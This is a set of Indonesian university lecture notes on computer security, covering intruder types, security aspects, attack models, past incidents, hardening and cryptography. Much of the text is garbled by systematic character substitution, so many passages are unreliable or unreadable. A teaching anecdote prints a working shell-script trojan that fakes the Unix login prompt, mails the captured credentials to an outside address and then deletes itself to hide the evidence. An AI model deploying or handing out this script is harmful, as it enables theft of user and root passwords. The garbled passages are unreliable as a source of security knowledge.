DIKTAT KULIAH

KEAMANAN KOMPUTER
OLEH : Isnaini,S.Kom., M.Pd.
SEMESTER : GENAP
UNIVERSITAS COKROAMINOTO PALOPO
TAHUN 2013/2014
UNTUK
KALANGAN
SENDIRI
DIKTAT KULIAH KEAMANAN KOMPUTER
PENDAHULUAN
Modal dasar :
Mengetahi !ahasa Pem"og"aman
Mengasai #engetahan #e"ang$at $e"as dan #e"ang$at %na$ #engont"o%n&a '%ogi$a
inte"(a)ing*.
Mengasai #enge%o%aan insta%asi $om#te".
Mengasai dengan +ai$ teo"i ,a"ingan $om#te" - #"oto$o%, in("ast"$t", media
$omni$asi.
Memahami )a"a $e",a s&stem o#e"asi.
Memi%i$i .#i$i"an ,ahat/ -0#
Cara belajar :
1a"i +$0+$ mengenai $eamanan $om#te" )eta$an, e0+oo$, ma,a%ah0ma,a%ah2ta+%oid
$om#te" edisi )eta$ ma#n edisi on%ine.
A$ses $e sits0sits "e3ie4 $eamanan ')ontoh: 444.)e"t.o"g *, sits0sits nde"g"ond
'si%ah$an )a"i 3ia sea")h engine*.
Pe%a,a"i "e3ie4 ata mana% +oo$ #e"ang$at $e"as dan #e"ang$at %na$ nt$ memahami
)a"a $e",a dengan +ai$.
Keamanan Komputer Menapa d!butu"#an $
information-based societ&5, men&e+a+$an ni%ai in(o"masi men,adi sangat #enting dan
menntt $emam#an nt$ menga$ses dan men&edia$an in(o"masi se)a"a )e#at dan
a$"at men,adi sangat esensia% +agi se+ah o"ganisasi,
In("ast"$t" 6a"ingan $om#te", se#e"ti LAN dan Inte"net, memng$in$an nt$
men&edia$an in(o"masi se)a"a )e#at, se$a%igs mem+$a #otensi adan&a %+ang
$eamanan (security hole*
Keja"atan Komputer sema#!n men!n#at #arena :
A#%i$asi +isnis +e"+asis TI dan ,a"ingan $om#te" mening$at : on%ine +an$ing, e0
)omme")e, E%e)t"oni) data Inte")hange 'EDI*.
Desent"a%isasi se"3e".
T"ansisi da"i sing%e 3endo" $e m%ti 3endo".
Mening$atn&a $emam#an #ema$ai 'se"*.
Kes%itan #enega$ ho$m dan +e%m adan&a $etentan &ang #asti.
Sema$in $om#%e$sn&a s&stem &ang digna$an, sema$in +esa"n&a so")e )ode
#"og"am &ang digna$an.
!e"h+ngan dengan inte"net.
Klas!%!#as! #eja"atan Komputer :
Le3e% anno&ing Le3e% Dange"os
Men"t Da3id I)o3e 76ohn D. Ho4a"d, An Analysis Of Security Incidents On The Internet
1989 - 1998,5 PhD thesis, Enginee"ing and P+%i) Po%i)&, 1a"negie Me%%on Uni3e"sit&, 9::;.<
+e"dasa"$an %+ang $eamanan, $eamanan da#at
di$%asi(i$asi$an men,adi em#at, &ait:
1. Keamanan &an bers!%at %!s!# (physical securit&*: te"mas$ a$ses o"ang $e gedng,
#e"a%atan, dan media &ang digna$an. 1ontoh :
=i"eta##ing ata ha%0ha% &ang +e"0h+ngan dengan a$ses $e $a+e% ata
$om#te" &ang digna$an ,ga da#at dimas$$an $e da%am $e%as ini.
Denial of serice, di%a$$an misa%n&a dengan memati$an #e"a%atan ata
mem+an,i"i sa%"an $omni$asi dengan #esan0#esan '&ang da#at +e"isi a#a sa,a
$a"ena &ang dita0ma$an ada%ah +an&a$n&a ,m%ah #esan*.
Syn !lood Attac$, dimana sistem (host* &ang dit, di+an,i"i o%eh #e"mintaan
sehingga dia men,adi te"0%a% si+$ dan +ah$an da#at +e"a$i+at ma)etn&a
sistem (hang*.
2. Keamanan &an ber"ubunan denan oran 'personel*, 1ontoh :
Identi(i$asi se" 'se"name dan #ass4o"d*
P"o(i% "esi$o da"i o"ang &ang mem#n&ai a$ses '#ema$ai dan #enge%o%a*.

3. Keamanan dar! data dan med!a serta te#n!# #omun!#as! (communications*.
4. Keamanan dalam operasi: Adan&a #"osed" &ang digna$an nt$ mengat" dan
menge%o%a sistem $eamanan, dan ,ga te"0mas$ #"osed" sete%ah se"angan (post
attac" recoer&*.
Kara#ter!st!# Pen&usup :
9. The 1"ios 'Si Ingin Tah* 0 ti#e #en&s# ini
#ada dasa"n&a te"ta"i$ menem$an ,enis sistem dan
data &ang anda mi%i$i.
>. The Ma%i)ios 'Si Pe"sa$* 0 ti#e #en&s# ini
+e"saha nt$ me"sa$ sistem anda, ata me"+ah
4e+ #age anda, ata se+a%i$n&a mem+at 4a$t dan
ang anda $em+a%i #%ih.
?. The High0P"o(i%e Int"de" 'Si P"o(i% Tinggi* 0 ti#e
#en&s# ini +e"saha menggna$an sistem anda
nt$ mem#e"o%eh #o#%a"itas dan $etena"an. Dia
mng$in menggna$an sistem #"o(i% tinggi anda nt$
mengi$%an$an $emam#ann&a.
@. The 1om#etition 'Si Pesaing* 0 ti#e #en&s# ini
te"ta"i$ #ada data &ang anda mi%i$i da%am sistem anda.
Ia mng$in seseo"ang &ang +e"angga#an +ah4a anda
memi%i$i sesat &ang da#at mengntng$ann&a
se)a"a $eangan ata se+a%i$n&a.
A(PEK KEAMANAN KOMPUTER :
Men"t Ga"(in$e% 7Simson Ga"(in$e%, #$#% #retty $ood #riac&,5 O/Rei%%& A Asso)i0ates,
In)., 9::8. <
)* Pr!+a,& - Con%!dent!al!t&
De(enisi : men,aga in(o"masi da"i o"ang &ang tida$ +e"ha$ menga$ses.
P"i3a)& : %e+ih $ea"ah data0data &ang si(atn&a #"i3at , 1ontoh : e0mai% seo"ang #ema$ai
(use"* tida$ +o%eh di+a)a o%eh administ"ato".
1on(identia%it& : +e"h+ngan dengan data &ang di+e"i$an $e #iha$ %ain nt$
$e#e"%an te"tent dan han&a di#e"+o%eh$an nt$ $e#e"%an te"tent te"se+t.
1ontoh : data0data &ang si(atn&a #"i+adi 'se#e"ti nama, tem#at tangga% %ahi", so)ia%
se)"it& nm+e", agama, stats #e"$a4inan, #en&a$it &ang #e"nah dide"ita, nomo" $a"t
$"edit, dan se+again&a* ha"s da#at di#"ote$si da%am #enggnaan dan #en&e+a"ann&a.
!ent$ Se"angan : saha #en&ada#an 'dengan #"og"am sniffe"*.
Usaha0saha &ang da#at di%a$$an nt$ mening$at$an #"i3a)& dan )on(identia%it&
ada%ah dengan menggna$an te$no%ogi $"i#tog"a(i.
Inter!t&
De(enisi : in(o"masi tida$ +o%eh di+ah tan#a sei,in #emi%i$ in(o"masi.
1ontoh : e0mai% di intercept di tengah ,a%an, di+ah isin&a, $emdian dite"s$an $e a%amat
&ang dit,.
!ent$ se"angan : Adan&a 3i"s, tro&an horse, ata #ema$ai %ain &ang meng+ah
in(o"masi tan#a i,in, Bman in the midd%e atta)$5 dimana seseo"ang menem#at$an di"i di
tengah #em+i)a"aan dan men&ama" se+agai o"ang %ain.
Aut"ent!,at!on
De(enisi : metoda nt$ men&ata$an +ah4a in(o"masi +et%0+et% as%i, ata o"ang &ang
menga$ses ata mem+e"i$an in(o"masi ada%ah +et%0+et% o"ang &ang dima$sd.
Ist!la" ba! pen&usup :
9. Mndane - tah mengenai ha)$ing ta#i tida$
mengetahi metode dan #"osesn&a.
>. %ame" 's)"i#t $iddies* - men)o+a s)"i#t> &ang
#e"nah di +at o%eh a$ti3is ha)$ing, ta#i tida$
#aham +agaimana )a"a mem+atn&a.
?. 4anna+e - #aham sedi$it metode ha)$ing, dan
sdah m%ai +e"hasi% mene"o+os sehingga
+e"(a%sa(ah - HA1K IS MC RELIGION.
@. %a"3a 'ne4+ie* - ha)$e" #em%a, te$ni$
ha)$ing m%ai di$asai dengan +ai$, se"ing
+e"e$s#e"imen.
8. ha)$e" - a$ti3itas ha)$ing se+agai #"o(esi.
D. 4iEa"d - ha)$e" &ang mem+at $omnitas
#em+e%a,a"an di anta"a me"e$a.
;. g" - maste" o( the maste" ha)$e", %e+ih
menga"ah $e #en)i#taan too%s0too%s &ang
#o4e"(%% &ang sa%ah satn&a da#at menn,ang
a$ti3itas ha)$ing, namn %e+ih ,adi too%s
#em"og"aman s&stem &ang mm.
D$ngan :
Adan&a Too%s mem+$ti$an $eas%ian do$men, da#at di%a$$an dengan te$no%ogi
4ate"ma"$ing'nt$ men,aga intellectual propert&5, &ait dengan menandai
do$men ata hasi% $a"&a dengan Btanda tangan5 #em+at * dan digita% signat"e.
A))ess )ont"o%, &ait +e"$aitan dengan #em+atasan o"ang &ang da#at menga$ses
in(o"masi. Use" ha"s menggna$an #ass4o"d, +iomet"i) ')i"i0)i"i $has o"ang*, dan
se,enisn&a.
A+a!lab!l!t&
De(enisi : +e"h+ngan dengan $ete"sediaan in(o"masi $eti$a di+th$an.
1ontoh ham+atan :
denial of serice attac$5 'DoS atta)$*, dimana se"3e" di$i"imi #e"mintaan '+iasan&a
#a%s* &ang +e"t+i0t+i ata #e"mintaan &ang di%a" #e"$i"aan sehingga tida$ da#at
me%a&ani #e"mintaan %ain ata +ah$an sam#ai do'n, hang, crash.
mailbom+, dimana seo"ang #ema$ai di$i"imi e0mai% +e"t+i0t+i '$ata$an "i+an e0
mai%* dengan $"an &ang +esa" sehingga sang #ema$ai tida$ da#at mem+$a e0
mai%n&a ata $es%itan menga$ses e0mai%n&a.
A,,ess Control
De(enisi : )a"a #engat"an a$ses $e#ada in(o"masi. +e"h+ngan dengan masa%ah
athenti)ation dan ,ga #"i3a)&
Metode : menggna$an $om+inasi se"id2#ass4o"d ata dengan
menggna$an me$anisme %ain.
Non.repud!at!on
De(enisi : As#e$ ini men,aga aga" seseo"ang tida$ da#at men&ang$a% te%ah me%a$$an
se+ah t"ansa$si. D$ngan +agi e%e)t"oni) )omme")e.
(ECURIT/ ATTACK MODEL(
Men"t =. Sta%%ings 7=i%%iam Sta%%ings, (et'or" and Internet'or" Securit&,5 P"enti)e
Ha%%, 9::8.< se"angan (attac$* te"di"i da"i :
Interruption: Pe"ang$at sistem men,adi "sa$ ata tida$ te"sedia. Se"angan dit,$an
$e#ada $ete"sediaan (aailabilit&* da"i sistem. 1ontoh se"angan ada%ah Bdenia% o( se"3i)e
atta)$5.
Interception: Piha$ &ang tida$ +e"4enang +e"hasi% menga$ses asset ata in(o"masi.
1ontoh da"i se"angan ini ada%ah #en&ada#an ('iretapping*.
Modification: Piha$ &ang tida$ +e"4enang tida$ sa,a +e"hasi% menga$ses, a$an teta#i
da#at ,ga meng+ah 'tam#e"* aset. 1ontoh da"i se"angan ini anta"a %ain ada%ah meng+ah
isi da"i 4e+ site dengan #esan0#esan &ang me"gi$an #emi%i$ 4e+ site.
Fabrication: Piha$ &ang tida$ +e"4enang men&isi#$an o+,e$ #a%s $e da%am sistem.
1ontoh da"i se"angan ,enis ini ada%ah memas$$an #esan0#esan #a%s se#e"ti e0mai% #a%s
$e da%am ,a"ingan $om#te".
(ECURIT/ 0REACH ACCIDENT
9::D )*S* !ederal +omputer Incident ,esponse +apability 'Fed1IR1*
me%a#o"$an +ah4a %e+ih da"i >8GG Binsiden5 di s&stem $om#te" ata
,a"ingan $om#te" &ang dise+a+$an o%eh gaga%n&a sistem $eamanan ata
adan&a saha nt$ mem+o+o% sistem $eamanan
9::D !-I (ational +omputer +rimes S.uad, =ashington D.1.,
mem#e"$i"a$an $e,ahatan $om#te" &ang te"dete$si $"ang da"i 98H, dan
han&a 9GH da"i ang$a it &ang di%a#o"$an
9::; Pene%itian Deloitte Touch Tohmatsu menn,$$an +ah4a da"i ?GG
#e"sahaan di Ast"a%ia, ?;H 'da dianta"a %ima* #e"nah menga%ami
masa%ah $eamanan sistem $om#te"n&a.
9::D Ingg"is, (++ Information Security -reaches Surey menn,$$an +ah4a
$e,ahatan $om#te" menai$ >GGH da"i tahn 9::8 $e 9::D. Ke"gian
"ata0"ata US I?G.GGG 2 insiden.
9::J F!I me%a#o"$an +ah4a $ass #e"sidangan &ang +e"h+ngan
dengan $e,ahatan $om#te" me"o$et :8GH da"i tahn 9::D $e
tahn 9::;, dengan #enang$a#an da"i @ $e @>, dan te"+$ti
(conicted* di #engadi%an nai$ JJH da"i 9D $e ?G $ass.
Dan %ain0%ain. Da#at di%ihat di 444.)e"t.o"g
1ontoh a$i+at da"i ,e+o%n&a sistem $eamanan, anta"a %ain:
9:JJ Keamanan sistem mai% sendmail die$s#%oitasi o%eh Ro+e"t
Ta#an Mo""is sehingga me%m#h$an sistem Inte"net. Kegiatan
ini da#at di$%asi(i$asi$an se+agai denial of serice attac$5.
Di#e"$i"a$an +ia&a &ang digna$an nt$ mem#e"+ai$i dan ha%0ha% %ain
&ang hi%ang ada%ah se$ita" I9GG ,ta. Di tahn 9::G Mo""is
dih$m ')on3i)ted* dan han&a didenda I9G.GGG.
9G Ma"et 9::; Seo"ang ha)$e" da"i Massa)hsetts +e"hasi% memati$an sistem
te%e$omni$asi di se+ah ai"#o"t %o)a% '=o")este", Massa)hsetts*
sehingga memati$an $omni$asi di )ont"o% to4e" dan mengha%a
#esa4at &ang henda$ menda"at.
Dia ,ga menga)a$an sistem te%e#on di Rt%and, Massa)hsetts.
htt#:22444.ne4s.)om2Ne4s2Item2TeKton%&2G,>8,>G>;J,GG.htm%L#(3
9::G Ke3in Po%sen mengam+i% a%ih s&stem $om#te" te%e$omni$asi di Los
Ange%es nt$ memenang$an $is di se+ah "adio %o)a%.
9::8 Ke3in Mitni)$, men)"i >G.GGG nomo" $a"t $"edit, men&a%in s&stem
o#e"asi DE1 se)a"a i%%ega% dan mengam+i% a%ih h+ngan te%#on di Ne4
Co"$ dan 1a%i(o"nia.
9::8 M%adimi" Le3in mem+o+o% +an$0+an$ di $a4asan =a%%st"eet,
mengam+i% ang se+esa" I9G ,ta.
>GGG Fa+ian 1%one men,e+o% sits aetna.)o.id dan 6a$a"ta mai% dan mem+at
di"e)to"& atas naman&a +e"isi #e"ingatan te"hada# administ"ato" sits
te"se+t.
>GGG !e+e"a#a 4e+ site Indonesia sdah di,e+o% dan da(ta"n&a '+ese"ta
)ontoh ha%aman &ang sdah di,e+o%* da#at di%ihat di $o%e$si
Nhtt#:22444.>DGG.)omO
>GGG =enas, mem+at se"3e" se+ah ISP di singa#"a do4n
MEMAHAMI HACKER 0EKER1A
Se)a"a mm me%a%i taha#an0taha#an se+agai +e"i$t :
9. Taha# men)a"i tah s&stem $om#te" sasa"an.
>. Taha# #en&s#an
?. Taha# #en,e%a,ahan
@. Taha# $e%a" dan menghi%ang$an ,e,a$.
1ontoh $ass T"o,an Hose, meman(aat$an SHELL s)"i#t UNIP :
Seoran/ /adis canti" dan /enit peserta "uliah )(I0 di sebuah per/uruan tin//i memili"i
potensi memancin/ pen/elola sistem "omputer (administrator peme/an/ account root * * *
hmmm1 yan/ len/ah* Ia melapor"an bah'a "omputer tempat ia mela"u"an tu/as-tu/as )(I0
yan/ diberi"an tida" dapat diper/una"an* San/ pen/elola sistem "omputer tentu sa&a den/an
/a/ah per"asa in/in menun&u""an "e"uasaan seba/ai administrator )(I0*
23ell4 ini soal "ecil* 5un/"in pass'ord "amu "e blo"ir4 biar saya perbai"i dari tempat
"amu24 u&ar administrator )(I0 sombon/ sambil dudu" disebelah /adis canti" dan /enit
peserta "uliah tersebut*
6eeso"an harinya4 ter&adilah "e"acauan di sistem )(I0 "arena didu/a ter&adi penyusupan
oleh hac"er termasu" &u/a hompepa/e per/uruan tin//i tersebut di-obo"-obo"4 ma"lum
pen/elolanya masih sama* Selan&utnya piha" per/uruan tin//i men/eluar"an press release
bah'a homepa/e mere"a di&ebol oleh hac"er dari 7uar (e/eri * * * * hihiii
Nah se+ena"n&a a#a sih &ang te",adi L
Sede"hana, gadis )anti$ dan genit #ese"ta $%iah UNIP te"se+t menggna$an #"og"am $e)i%
m&Q%ogin da%am +ent$ she%% s)"i#t &ang men&e"#ai %a&a" %ogin dan #ass4o"d sistem UNIP
se+agai +e"i$t:
#!/bin/sh
###################################
# Nama program : my_login
# Deskripsi :Program kuda trojan sederhana
# versi 1. Nopember 1!!!
####################################
"#$N%&'(
"at /et)/issue
*hile + ,-"#$N%&', .ne / 0
do
let "#$N%&'(-"#1$N%&'21
e)ho ,login: 3),
read 4#51N
stty e)ho
e)ho ,pass6ord: 3),
read P788*#'D
e)ho ,$ser -4#51N : -P788*#'D, 9 mail gadis:)ompany.)om
stty e)ho
e)ho
e)ho ,4ogin 1n)orre)t,
done
rm -
kill .! -PP1D
A#a+i%a #"og"am ini di,a%an$an ma$a a$an ditam#i%$an %a&a" %ogin se#e"ti %a&a$n&a a4a%
#enggnaan $om#te" #daa sistem UNIP:
Login:
Password:
Lihat%ah, Administ"ato" UNIP &ang gagah #e"$asa tadi &ang tida$ me%ihat gadis te"se+t
men,a%an$an #"og"am ini tentn&a tida$ sada" +ah4a ini me"#a$an %a&a" ti#an. La&a" %ogin
ini tida$ te"%ihat +eda di+anding %a&a" %ogin sesngghn&a.
Se#e"ti #ada #"og"am %ogin sesngghn&a, sistem $om#te" a$an meminta #ema$ai nt$
%ogin $e da%am sistem. Sete%ah diisi #ass4o"d dan di ente",ma$a sege"a tim+% #esan
Login:root
Password: ********
Login Incorrect
Tent sa,a Administ"ato" UNIP a$an $aget +ah4a #ass4o"dn&a te"n&ata 'seo%ah0o%ah* sa%ah.
Unt$ it ia sege"a meng%angi %ogin dan #ass4o"d. Sete%ah da $a%i ia men)o+a %ogin dan
tida$ +e"hasi%, ma$a %oginn&a di+ata%$an dan $em+a%i $e%a" UNIP.
Pe"hati$an #"og"am di atas +ai$0+ai$, se$a%i #ema$ai te"se+t men)o+a %ogin dan mengisi
#ass4o"d #ada %a&a" di atas, sete%ah it ma$a otomatis data %ogin dan #ass4o"d te"se+t a$an
di emai% $e mai%to:ha)$e"R)om#an&.)om. Sam#ai disini ma$a si gadis %g dan genit te%ah
menda#at$an %ogin dan #ass4o"d . . . ia te"n&ata seo"ang ha)$e" SS
=a%a#n sede"hana, ,i$a $ita #e"hati$an %e+ih ,ah %agi, ma$a #"og"am ini ,ga memi%i$i
+e+e"a#a t"i$ ha)$e" %ainn&a, &ait #"oses #enghi%angan ,e,a$ 'masih ingat taha#an ha)$e"
&ang dit%is di atas L*. P"oses ini di%a$$an #ada > +a"is te"a$hi" da"i #"og"am m&Q%ogin di
atas, &ait
rm $0
kill 9 $PPID
&ang a"tin&a a$an sege"a di%a$$an #"oses #engha#san #"og"am m&Q%ogin dan ha#s #%a ID
da"i #"oses. Dengan demi$ian hi%ang%ah #"og"am te"se+t &ang tentn&a ,ga menhi%ang$an
+a"ang +$ti. Ditam+ah %agi #engha#san te"hada# ,e,a$ #"oses di da%am sistem UNIP. Ta# . .
. hi%ang sdah tanda0tanda +ah4a ha)$e" n&a te"n&ata seo"ang gadis #ese"ta $%iahn&a.
S$ses da"i #"og"am ini se+ena"n&a sangat te"gantng da"i +agaimana aga" a#%i$asi ini da#at
die$se$si o%eh "oot. Ha)$e" &ang +ai$ memang ha"s +e"saha meman)ing aga" #emi%i$ "oot
men,a%an$an #"og"am ini.
PRIN(IP DA(AR PERANCAN2AN (I(TEM /AN2 AMAN
9. Men)egah hi%angn&a data
>. Men)egah mas$n&a #en&s#
LAPI(AN KEAMANAN :
9. La#isan Fisi$ :
mem+atasi a$ses (isi$ $e mesin :
o A$ses mas$ $e "angan $om#te"
o #engn)ian $om#te" se)a"a ha"d4a"e
o $eamanan !IOS
o $eamanan !oot%oade"
+a)$0# data :
o #emi%ihan #i"anti +a)$0#
o #en,ad4a%an +a)$0#
mendete$si ganggan (isi$ :
%og (i%e : Log #ende$ ata tida$ %eng$a#, Log &ang +e"isi$an 4a$t &ang aneh, Log
dengan #e"misi ata $e#emi%i$an &ang tida$ te#at, 1atatan #e%a&anan "e+oot ata
"esta"t, Log &ang hi%ang, mas$an s ata %ogin da"i tem#at &ang ,angga%
mengont"o% a$ses sm+e" da&a.
>. Keamanan %o$a%
!e"$aitan dengan se" dan ha$0ha$n&a :
!e"i me"e$a (asi%itas minima% &ang di#e"%$an.
Hati0hati te"hada# saat2da"i mana me"e$a %ogin, ata tem#at seha"sn&a me"e$a %ogin.
Pasti$an dan ha#s "e$ening me"e$a $eti$a me"e$a tida$ %agi mem+th$an a$ses.
?. Keamanan Root
Keti$a me%a$$an #e"intah &ang $om#%e$s, )o+a%ah da%am )a"a &ang tida$ me"sa$
d%, te"tama #e"intah &ang menggna$an g%o++ing: )ontoh, anda ingin me%a$$an
U"m (ooV.+a$U, #e"tama )o+a d%: U%s (ooV.+a$U dan #asti$an anda ingin mengha#s
(i%e0(i%e &ang anda #i$i"$an.
!e+e"a#a o"ang me"asa te"+ant $eti$a me%a$$an Uto)h 20iU #ada sistem me"e$a.
Ha% ini a$an mem+at #e"intah0#e"intah se#e"ti : U"m 0(" VU menan&a$an a#a$ah anda
+ena"0+ena" ingin mengha#s se%"h (i%e. 'She%% anda meng"ai$an U0iU d%, dan
mem+e"%a$$ann&a se+agai o#tion 0i $e "m*.
Han&a men,adi "oot $eti$a me%a$$an tgas tngga% te"tent. 6i$a anda +e"saha
mengetahi +agaimana me%a$$an sesat, $em+a%i $e she%% #ema$ai no"ma% hingga
anda &a$in a#a &ang #e"% di%a$$an o%eh "oot.
6a%" #e"intah nt$ #ema$ai "oot sangat #enting. 6a%" #e"intah, ata 3a"ia+e%
%ing$ngan PATH mende(inisi$an %o$a% &ang di)a"i she%% nt$ #"og"am. 1o+a%ah
dan +atasi ,a%" #e"intah +agi #ema$ai "oot seda#at mng$in, dan ,angan #e"nah
menggna$an W.W, &ang +e"a"ti Wdi"e$to"i saat iniW, da%am #e"n&ataan PATH anda.
Se+agai tam+ahan, ,angan #e"nah mena"h di"e$to"i &ang da#at dit%is #ada ,a%"
#en)a"ian anda, $a"ena ha% ini memng$in$an #en&e"ang memodi(i$asi ata mena"h
(i%e +ine" da%am ,a%" #en)a"ian anda, &ang memng$in$an me"e$a men,adi "oot
$eti$a anda men,a%an$an #e"intah te"se+t.
6angan #e"nah menggna$an se#e"ang$at ti%itas "%ogin2"sh2"eKe) 'dise+t ti%itas "*
se+agai "oot. Me"e$a men,adi sasa"an +an&a$ se"angan, dan sangat +e"+aha&a +i%a
di,a%an$an se+agai "oot. 6angan mem+at (i%e ."hosts nt$ "oot.
Fi%e 2et)2se)"ett& +e"isi$an da(ta" te"mina%0te"mina% tem#at "oot da#at %ogin. Se)a"a
+a$ '#ada RedHat LinK* diset han&a #ada $onso% 3i"ta% %o$a% '3t&*. !e"hati0hati%ah
saat menam+ah$an &ang %ain $e (i%e ini. Anda seha"sn&a %ogin da"i ,a"a$ ,ah
se+agai #ema$ai +iasa dan $emdian WsW ,i$a anda +th 'mdah0mdahan me%a%i
ssh ata sa%"an te"en$"i#si %ain*, sehingga tida$ #e"% nt$ %ogin se)a"a %angsng
se+agai "oot.
Se%a% #e"%ahan dan +e"hati0hati $eti$a men,adi "oot. Tinda$an anda da#at
mem#enga"hi +an&a$ ha%. Pi$i" se+e%m anda mengeti$S
@. Keamanan Fi%e dan s&stem (i%e
Di"e)to"& home se" tida$ +o%eh menga$ses #e"intah meng+ah s&stem se#e"ti #a"tisi,
#e"+ahan de3i)e dan %ain0%ain.
La$$an setting %imit s&stem (i%e.
At" a$ses dan #e"mission (i%e : "ead, 4"ita, eKe)te +agi se" ma#n g"o#.
Se%a% )e$ #"og"am0#"og"am &ang tida$ di$ena%
8. Keamanan Pass4o"d dan En$"i#si
Hati0hati te"hada# +"to (o")e atta)$ dengan mem+at #ass4o"d &ang +ai$.
Se%a% mengen$"i#si (i%e &ang di#e"t$a"$an.
La$$an #engamanan #ada %e3e% tam#i%an, se#e"ti s)"een sa3e".
D. Keamanan Ke"ne%
se%a% #date $e"ne% s&stem o#e"asi.
I$ti "e3ie4 +gs dan $e$"ang0$e$"angan #ada s&stem o#e"asi.
;. Keamanan 6a"ingan
=as#adai #a$et sni((e" &ang se"ing men&ada# #o"t Ethe"net.
La$$an #"osed" nt$ menge)e$ integ"itas data
Me"i(i$asi in(o"masi DNS
Lindngi net4o"$ (i%e s&stem
Gna$an (i"e4a%% nt$ +a""ie" anta"a ,a"ingan #"i3at dengan ,a"ingan e$ste"na%
KRIPTOGRAFI
DE3ENI(I
Cryptography adalah suatu ilmu ataupun seni mengamankan pesan, dan dilakukan oleh
cryptographer.
Cryptanalysis adalah suatu ilmu dan seni membuka (breaking) ciphertext dan orang yang
melakukannya disebut cryptanalyst.
ELEMEN
CR/PTO(/(TEM
Cryptographic system atau cryptosystem adalah suatu fasilitas untuk mengkonversikan
plaintext ke ciphertext dan sebaliknya. Dalam sistem ini, seperangkat parameter yang
menentukan transformasi pencipheran tertentu disebut suatu set kunci. Proses enkripsi dan
dekripsi diatur oleh satu atau beberapa kunci kriptografi.
)* Kr!ptora%! dapat memenu"! #ebutu"an umum suatu transa#s!:
9. Ke"ahasiaan 'confidentiality* di,amin dengan me%a$$an en$"i#si
'#en&andian*.
>. Kethan 'inte/rity* atas data0data #em+a&a"an di%a$$an dengan (ngsi
hash sat a"ah.
?. 6aminan atas identitas dan $ea+sahan 'authenticity* #iha$0#iha$ &ang
me%a$$an t"ansa$si di%a$$an dengan menggna$an pass'ord ata se"ti(i$at
digita%. Sedang$an $eotenti$an data t"ansa$si da#at di%a$$an dengan tanda
tangan digita%.
@. T"ansa$si da#at di,adi$an +a"ang +$ti &ang tida$ +isa disang$a% 'non-
repudiation* dengan meman(aat$an tanda tangan digita% dan se"ti(i$at digita%.
4* Kara#ter!st!# ,r&ptos&tem &an ba!# sebaa! ber!#ut :
9. Keamanan sistem te"%eta$ #ada $e"ahasiaan $n)i dan +$an #ada $e"ahasiaan
a%go"itma &ang digna$an.
>. 1"&#tos&stem &ang +ai$ memi%i$i "ang $n)i '$e&s#a)e* &ang +esa".
?. 1"&#tos&stem &ang +ai$ a$an menghasi%$an )i#he"teKt &ang te"%ihat a)a$ da%am
se%"h tes statisti$ &ang di%a$$an te"hada#n&a.
@. 1"&#tos&stem &ang +ai$ mam# menahan se%"h se"angan &ang te%ah di$ena%
se+e%mn&a
5* MACAM CR/PTO(/(TEM
A. S&mmet"i) 1"&#tos&stem
Da%am s&mmet"i) )"&#tos&stem ini, $n)i &ang digna$an nt$ #"oses en$"i#si dan de$"i#si
#ada #"insi#n&a identi$, teta#i sat +ah $n)i da#at #%a dit"n$an da"i $n)i &ang %ainn&a.
Kn)i0$n)i ini ha"s di"ahasia$an. O%eh $a"ena it%ah sistem ini se"ing dise+t se+agai
secret-"ey ciphersystem. 6m%ah $n)i &ang di+th$an mmn&a ada%ah :
n
1
>
X n . 'n09*
00000000
>
dengan n men&ata$an +an&a$n&a #enggna.
1ontoh da"i sistem ini ada%ah Data En)"&#tion Standa"d 'DES*, !%o4(ish, IDEA.
!. Ass&mmet"i) 1"&#tos&stem
Da%am ass&mmet"i) )"&#tos&stem ini digna$an da +ah $n)i. Sat $n)i &ang dise+t
$n)i #+%i$ 'public "ey* da#at di#+%i$asi$an, sedang $n)i &ang %ain &ang dise+t $n)i
#"i3at 'priate "ey* ha"s di"ahasia$an. P"oses menggna$an sistem ini da#at dite"ang$an
se)a"a sede"hana se+agai +e"i$t : +i%a A ingin mengi"im$an #esan $e#ada !, A da#at
men&andi$an #esann&a dengan menggna$an $n)i #+%i$ !, dan +i%a ! ingin mem+a)a s"at
te"se+t, ia #e"% mende$"i#si$an s"at it dengan $n)i #"i3atn&a. Dengan demi$ian $eda
+e%ah #iha$ da#at men,amin asa% s"at se"ta $eas%ian s"at te"se+t, $a"ena adan&a me$anisme
ini. 1ontoh sistem ini anta"a %ain RSA S)heme dan Me"$%e0He%%man S)heme.
6* PROTOKOL CR/PTO(/(TEM
Cryptographic protocol adalah suatu protokol yang menggunakan kriptografi. Protokol ini
melibatkan sejumlah algoritma kriptografi, namun secara umum tujuan protokol lebih dari
sekedar kerahasiaan. Pihakpihak yang berpartisipasi mungkin saja ingin membagi sebagian
rahasianya untuk menghitung sebuah nilai, menghasilkan urutan random, atau pun
menandatangani kontrak secara bersamaan.
Penggunaan kriptografi dalam sebuah protokol terutama ditujukan untuk mencegah atau pun
mendeteksi adanya eavesdropping dan cheating.
7* 1ENI( PEN/ERAN2AN PADA PROTOKOL
1i#he"teKt0on%& atta)$. Da%am #en&e"angan ini, seo"ang )"&#tana%&st memi%i$i
)i#he"teKt da"i se,m%ah #esan &ang se%"hn&a te%ah dien$"i#si menggna$an
a%go"itma &ang sama.
Kno4n0#%ainteKt atta)$. Da%am ti#e #en&e"angan ini, )"&#tana%&st memi%i$i a$ses
tida$ han&a $e )i#he"teKt se,m%ah #esan, namn ia ,ga memi%i$i #%ainteKt #esan0
#esan te"se+t.
1hosen0#%ainteKt atta)$. Pada #en&e"angan ini, )"&#tana%&st tida$ han&a memi%i$i
a$ses atas )i#he"teKt dan #%ainteKt nt$ +e+e"a#a #esan, teta#i ia ,ga da#at memi%ih
#%ainteKt &ang dien$"i#si.
Ada#ti3e0)hosen0#%ainteKt atta)$. Pen&e"angan ti#e ini me"#a$an sat $ass
$hss )hosen0#%ainteKt atta)$. 1"&#tana%&st tida$ han&a da#at memi%ih #%ainteKt
&ang dien$"i#si, ia #n memi%i$i $emam#an nt$ memodi(i$asi #i%ihan +e"dasa"$an
hasi% en$"i#si se+e%mn&a. Da%am )hosen0#%ainteKt atta)$, )"&#tana%&st mng$in
han&a da#at memi%i$i #%ainteKt da%am sat +%o$ +esa" nt$ dien$"i#si- da%am
ada#ti3e0)hosen0#%ainteKt atta)$ ini ia da#at memi%ih +%o$ #%ainteKt &ang %e+ih $e)i%
dan $emdian memi%ih &ang %ain +e"dasa"$an hasi% &ang #e"tama, #"oses ini da#at
di%a$$ann&a te"s mene"s hingga ia da#at mem#e"o%eh se%"h in(o"masi.
1hosen0)i#he"teKt atta)$. Pada ti#e ini, )"&#tana%&st da#at memi%ih )i#he"teKt &ang
+e"+eda nt$ dide$"i#si dan memi%i$i a$ses atas #%ainteKt &ang dide$"i#si.
